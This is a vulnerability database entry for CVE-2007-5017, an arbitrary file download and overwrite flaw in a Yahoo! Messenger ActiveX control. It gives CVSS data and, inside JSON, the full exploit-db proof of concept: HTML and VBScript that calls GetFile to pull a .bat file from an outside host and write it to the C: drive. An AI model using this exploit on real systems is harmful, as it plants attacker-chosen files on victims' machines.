Search...

Yahoo! Messenger CYFT Object ActiveX (ft60.dll) GetFile Method Arbitrary File Overwrite

2007-09-19T00:00:00

ID OSVDB:38296
Type osvdb
Reporter OSVDB
Modified 2007-09-19T00:00:00

Description

No description provided by the source

References:

Security Tracker: 1018715 Other Advisory URL: http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html ISS X-Force ID: 36694 Generic Exploit URL: http://www.milw0rm.com/exploits/4428 CVE-2007-5017 Bugtraq ID: 25727

JSON Vulners Source

Initial Source

{"bulletinFamily": "software", "viewCount": 0, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1018715\nOther Advisory URL: http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html\nISS X-Force ID: 36694\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4428\n[CVE-2007-5017](https://vulners.com/cve/CVE-2007-5017)\nBugtraq ID: 25727\n", "affectedSoftware": [], "href": "https://vulners.com/osvdb/OSVDB:38296", "modified": "2007-09-19T00:00:00", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2017-04-28T13:20:34", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5017"]}, {"type": "exploitdb", "idList": ["EDB-ID:4428"]}], "modified": "2017-04-28T13:20:34", "rev": 2}, "vulnersScore": 7.0}, "id": "OSVDB:38296", "title": "Yahoo! Messenger CYFT Object ActiveX (ft60.dll) GetFile Method Arbitrary File Overwrite", "edition": 1, "published": "2007-09-19T00:00:00", "type": "osvdb", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "cvelist": ["CVE-2007-5017"], "lastseen": "2017-04-28T13:20:34"}

{"cve": [{"lastseen": "2021-02-02T05:31:26", "description": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method.", "edition": 4, "cvss3": {}, "published": "2007-09-20T21:17:00", "title": "CVE-2007-5017", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-5017"], "modified": "2017-09-29T01:29:00", "cpe": ["cpe:/a:yahoo:messenger:8.1.0.421"], "id": "CVE-2007-5017", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5017", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:yahoo:messenger:8.1.0.421:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-01-31T20:54:05", "description": "Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download. CVE-2007-5017. Remote exploit for windows platform", "published": "2007-09-19T00:00:00", "type": "exploitdb", "title": "Yahoo! Messenger 8.1.0.421 CYFT Object Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5017"], "modified": "2007-09-19T00:00:00", "id": "EDB-ID:4428", "href": "https://www.exploit-db.com/exploits/4428/", "sourceData": "<pre>\n<code><body bgcolor=\"#E0E0E0\">-----------------------------------------------------------------------------\n Yahoo! Messenger 8.1.0.421 CYFT Object (ft60.dll) Arbitrary File Download\n url: http://download.yahoo.com/dl/msgr8/us/ymsgr8us.exe\n\n Author: shinnai\n mail: shinnai[at]autistici[dot]org\n site: http://shinnai.altervista.org\n\n This was written for educational purpose. Use it at your own risk.\n Author will be not responsible for any damage.\n\n Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7\n\n Marked as:\n RegKey Safe for Script: False\n RegkeySafe for Init: False\n KillBitSet: False\n\n From remote: depends by Internet Explorer settings\n From local: yes\n\n Description:\n This contron contains a \"GetFile()\" method which allows to download, on\n user's pc, an arbitrary file pased as argument.\n Remote execution depends by Internet Explorer settings, local execution\n works very well.\n\n greetz to: skyhole (or YAG KOHHA) for inspiration\n-----------------------------------------------------------------------------\n<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>\n\n<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>\n\n<script language='vbscript'>\n Sub tryMe\n test.GetFile \"http://www.shinnai.altervista.org/shinnai.bat\",\"c:\\\\shinnai.bat\",5,1,\"shinnai\"\n MsgBox \"Exploit completed\"\n End Sub\n</script>\n\n</code></pre>\n\n# milw0rm.com [2007-09-19]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/4428/"}]}